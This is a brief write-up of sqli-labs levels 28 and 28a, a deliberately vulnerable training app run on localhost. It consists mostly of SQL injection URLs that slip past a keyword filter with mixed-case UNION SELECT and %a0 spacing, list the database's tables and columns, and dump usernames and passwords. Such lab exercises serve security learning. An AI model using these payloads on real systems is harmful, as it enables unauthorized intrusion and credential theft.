sqli-labs (menos-28 y menos-28a)
menos-28
Ingrese el nivel 28, ingrese ID = 1 para
ver el código fuente. Se
encuentra que es básicamente el mismo que el nivel 27, aún usando mayúsculas y minúsculas para omitir
http://127.0.0.1/sql1/Less-28/?id=1' #回显错误
http://127.0.0.1/sql1/Less-28/?id=1');%00 #正常显示
Juzgue el modo de cierre como ');% 00, e inyecte el tipo de carácter para
determinar la posición del eco
http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,3;%00
Ver biblioteca actual
http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,database();%00
Ver todas las tablas en la biblioteca de seguridad
http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,(select (group_concat(table_name)) from (information_schema.tables) where (table_schema='security'));%00
Ver todos los campos debajo de la tabla de usuarios
http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,(select (group_concat(column_name)) from (information_schema.columns) where (table_name='users'));%00
Ver los valores de los campos de nombre de usuario y contraseña
http://127.0.0.1/sql1/Less-28/?id=111') %a0 UniON %a0 sElect %a0 1,2,(select (group_concat(username,password)) from (security.users));%00
menos-28a
http://127.0.0.1/sql1/Less-28a/?id=1' #回显错误
http://127.0.0.1/sql1/Less-28a/?id=1');%00 #回显正常
Juzgue el método de cierre como ');% 00, e inyecte el tipo de carácter.
Lo siguiente no es específico, es exactamente lo mismo que less-28, esta pasada también usa mayúsculas y minúsculas para eludir el firewall waf